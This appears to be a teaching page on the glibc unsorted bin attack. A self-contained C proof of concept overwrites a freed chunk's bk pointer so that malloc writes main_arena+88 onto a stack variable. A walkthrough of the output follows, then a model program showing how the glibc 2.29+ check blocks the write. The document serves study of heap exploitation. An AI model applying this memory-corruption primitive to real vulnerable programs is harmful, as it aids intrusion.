Source
#include <stdio.h>
#include <stdlib.h>

int main(){
	fprintf(stderr, "This file demonstrates unsorted bin attack by writing a large unsigned long value into stack\n");
	fprintf(stderr, "In practice, unsorted bin attack is generally prepared for further attacks, such as rewriting the "
	                "global variable global_max_fast in libc for further fastbin attack\n\n");

	/* The target word lives on the stack and starts out as 0. */
	unsigned long stack_var=0;
	fprintf(stderr, "Let's first look at the target we want to rewrite on stack:\n");
	fprintf(stderr, "%p: %lu\n\n", (void*)&stack_var, stack_var);

	/* First chunk: it will later be freed into the unsorted bin. */
	unsigned long *p=malloc(400);
	fprintf(stderr, "Now, we allocate first normal chunk on the heap at: %p\n",(void*)p);
	/* Second chunk keeps p away from the top chunk so free(p) does not consolidate it. */
	fprintf(stderr, "And allocate another normal chunk in order to avoid consolidating the top chunk with "
	                "the first one during the free()\n\n");
	malloc(500);

	/* p is too large for the fastbins/tcache of this demo, so it goes to the unsorted bin.
	   p[0] is now the chunk's fd and p[1] its bk (both point at the bin head in main_arena). */
	free(p);
	fprintf(stderr, "We free the first chunk now and it will be inserted in the unsorted bin with its bk pointer "
	                "point to %p\n",(void*)p[1]);

	//------------VULNERABILITY-----------

	/* Emulated bug: bk is pointed at a fake chunk whose fd field (offset 16) overlaps stack_var. */
	p[1]=(unsigned long)(&stack_var-2);
	fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->bk pointer\n");
	fprintf(stderr, "And we write it with the target address-16 (in 32-bits machine, it should be target address-8):%p\n\n",(void*)p[1]);

	//------------------------------------

	/* malloc unlinks p from the unsorted bin: bck->fd = unsorted_chunks(av), i.e. stack_var = &bin head. */
	malloc(400);
	fprintf(stderr, "Let's malloc again to get the chunk we just freed. During this time, the target should have already been "
	                "rewritten:\n");
	fprintf(stderr, "%p: %p\n", (void*)&stack_var, (void*)stack_var);
	return 0;
}
Operation result
First, an unsigned long variable var is declared on the stack.
Then a 400-byte chunk p is allocated on the heap, followed by a 500-byte chunk, so that freeing p does not consolidate it with the top chunk.
Then p is freed and enters the unsorted bin.
At this point the bk pointer of p holds 0x7ffff7dd1b78.
The bk pointer is then overwritten with the address of var minus 16 bytes.
In effect, the memory around var is treated as a fake heap chunk:
var occupies the first 8 bytes of the fake chunk's data area, that is, its fd field.
A further 400-byte allocation is then requested, and it is served from the freed space of p.
While unlinking p, malloc writes the fd field of the chunk that p's bk points to, namely var, with 0x7ffff7dd1b78 (this value is always main_arena + 88).
That is a large unsigned long value.
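To make explicit which allocator step performs the write and why the written value is the address of the unsorted bin head (main_arena + 88), the following added C example models the unsorted-bin unlink in isolation. It is not glibc code and not part of the original page: chunk_t, bin_insert, bin_take_oldest and demo are simplified stand-ins, and the optional integrity check models the bck->fd != victim / victim->fd != bin test that glibc 2.29 and later perform before unlinking, which makes malloc abort with "malloc(): unsorted double linked list corrupted" instead of performing the write.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Minimal model of a free chunk: only the fields the unsorted bin touches.
 * Constructed for this example; it is not glibc's malloc_chunk. */
typedef struct chunk {
    size_t prev_size;
    size_t size;
    struct chunk *fd;   /* offset 16 on a 64-bit build: this is where the page's var sits */
    struct chunk *bk;
} chunk_t;

/* Offset of fd inside a chunk; explains the "target address - 16" in the page. */
static size_t target_offset(void) { return offsetof(chunk_t, fd); }

/* free(): insert victim at the head of the circular list whose head is `bin`. */
static void bin_insert(chunk_t *bin, chunk_t *victim) {
    chunk_t *fwd = bin->fd;
    victim->fd = fwd;
    victim->bk = bin;   /* a freshly freed chunk's bk points at the bin head */
    fwd->bk = victim;
    bin->fd = victim;
}

/* malloc(): take the oldest chunk (bin->bk) out of the list.
 * With check_integrity set, the glibc 2.29+ style test runs first and the
 * function returns NULL without writing anything when the list is corrupt. */
static chunk_t *bin_take_oldest(chunk_t *bin, int check_integrity) {
    chunk_t *victim = bin->bk;
    chunk_t *bck = victim->bk;
    if (check_integrity && (bck->fd != victim || victim->fd != bin))
        return NULL;    /* glibc: "malloc(): unsorted double linked list corrupted" */
    bin->bk = bck;
    bck->fd = bin;      /* the write the unsorted-bin attack redirects: *(bck+16) = &bin */
    return victim;
}

/* Replays the page's scenario. Returns 1 if the unlink went through, 0 if the
 * check refused it; *target_out receives the fake chunk's fd (the page's var)
 * and *bin_addr_out the bin head's address (the page's main_arena + 88). */
static int demo(int check_integrity, uintptr_t *target_out, uintptr_t *bin_addr_out) {
    chunk_t bin = {0}, p = {0}, fake = {0};  /* fake.fd plays the role of stack_var (= 0) */
    bin.fd = bin.bk = &bin;                  /* empty unsorted bin */
    bin_insert(&bin, &p);                    /* free(p): p.bk == &bin */
    p.bk = &fake;                            /* emulated bug: victim->bk = &stack_var - 16 */
    chunk_t *got = bin_take_oldest(&bin, check_integrity);  /* malloc(400) */
    *target_out = (uintptr_t)fake.fd;
    *bin_addr_out = (uintptr_t)&bin;
    return got != NULL;
}

int main(void) {
    uintptr_t target, bin_addr;
    int ok = demo(0, &target, &bin_addr);
    printf("no check : unlinked=%d target=0x%lx bin head=0x%lx\n",
           ok, (unsigned long)target, (unsigned long)bin_addr);
    ok = demo(1, &target, &bin_addr);
    printf("with check: unlinked=%d target=0x%lx (unchanged)\n",
           ok, (unsigned long)target);
    return 0;
}
```

Without the check, the target word ends up equal to the bin head's address, which is exactly the main_arena + 88 value the page reports; with the check, the fake chunk's fd does not point back at the victim, so the unlink is refused and the target stays 0. This is why the raw form of the attack shown above stops working on glibc 2.29 and later.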